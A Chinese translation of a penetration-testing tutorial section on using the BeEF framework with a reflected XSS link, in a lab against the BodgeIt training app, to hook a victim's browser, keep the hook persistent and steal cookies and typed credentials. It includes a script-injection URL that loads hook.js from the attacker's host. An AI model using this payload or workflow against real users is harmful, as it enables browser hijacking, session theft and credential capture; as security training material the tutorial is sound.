翻译来自：掣雷小组

成员信息：

thr0cyte，Gr33k，花花，MrTools，R1ght0us，7089bAt

标记红色的部分为今日更新内容。

第五章、使用跨站脚本攻击客户端

5.0、介绍

5.1、使用浏览器绕过客户端控制

5.2、识别跨站脚本漏洞

5.3、利用XSS获取cookie

5.4、利用DOM XSS

5.5、利用BeEF执行xss攻击

5.6、从Web存储中提取信息

5.7、使用ZAP测试WebSokets

5.8、使用XSS和metasploit获取远程shell

5.5、利用BeEF执行xss攻击

BeEF，全称The BrowserExploitation framework(浏览器攻击框架)，是一款针对web浏览器的渗透测试工具。

在这个小节中，我们将演示利用XSS漏洞和BeEF框架控制目标浏览器。

环境准备

在开始之前，我们需要确保已经启动了BeEF服务，默认管理页面的url是：

http://127.0.0.1:3000/ui/panel(默认账号密码为BeEF /BeEF)。

1. 在kali linux中默认的BeEF的服务是不起作用的，所以不能以beef-xss这样简单的方式来启动BeEF。我们需要从安装它的目录下启动它，如下图所示:

l cd/usr/share/beef-xss/

l https://www.cloud.tencent.com/developer/article/beef

2. 现在，浏览器打开http://127.0.0.1:3000/ui/panel并使用默认账户名密码（beef/beef）。如果成功打开，那我们就准备进行下一步。

实战演练

BeEF需要目标浏览器调用hook.js文件，它能让浏览器挂钩到我们的BeEF服务器，另外我们将利用一个易受XSS攻击的应用程序，让目标用户调用它:

1. 想象你是受害者，你收到了一封包含xss链接的电子邮件，若你点击它，访问了该链接：

http://192.168.56.11/bodgeit/search.jsp?q=<scriptsrc="http://192.168.56.10:3000/hook.js"> </script>

2. 现在，在BeEF面板中，攻击者将看到一个浏览器上线:

3. 如果我们在浏览器中查看Logs选项卡，我们可以看到BeEF存储了用户在浏览器窗口中执行的操作的信息，比如输入和单击，如下图所示:

4. 在浏览器被hook.js文件挂钩之后，目标用户在被域中导航攻击时，攻击者最好要让会话变为持久性的。下一步转到攻击者浏览器中的Commands选项卡，进入模块目录，转到浏览器中的Persistence | Man-In-The-Browser，然后单击Execute执行他。

5. 模块执行后，在模块的历史记录中选择相关命令，检查结果如下:

6. 攻击者还可以使用BeEF在受害者浏览器中执行命令。例如，在模块目录中，到Browser | Get cookie，点击Execute来获取用户的cookie:

原理剖析

在此小节中，我们使用script标记中的src属性来调用外部Javascript文件。在这个例子中，我们是调用了BeEF服务器的钩子。

这个hook.js文件与服务器通信，执行命令，并返回响应，以便攻击者可以看到;它不会在客户端浏览器中打印任何内容，因此受害者通常不会知道他的浏览器已经被劫持。

在让受害者执行钩子脚本之后，我们使用浏览器中的持久化模块Man-in-the-Browser，让浏览器在每次用户单击到相同域的链接时执行AJAX请求，以便该请求保留钩子并加载新页面。

我们还看到，BeEF的日志记录了用户在页面上执行的每个操作，我们可以从中获得用户名和密码。还可以远程获取会话cookie，这可能允许攻击者劫持受害者的会话。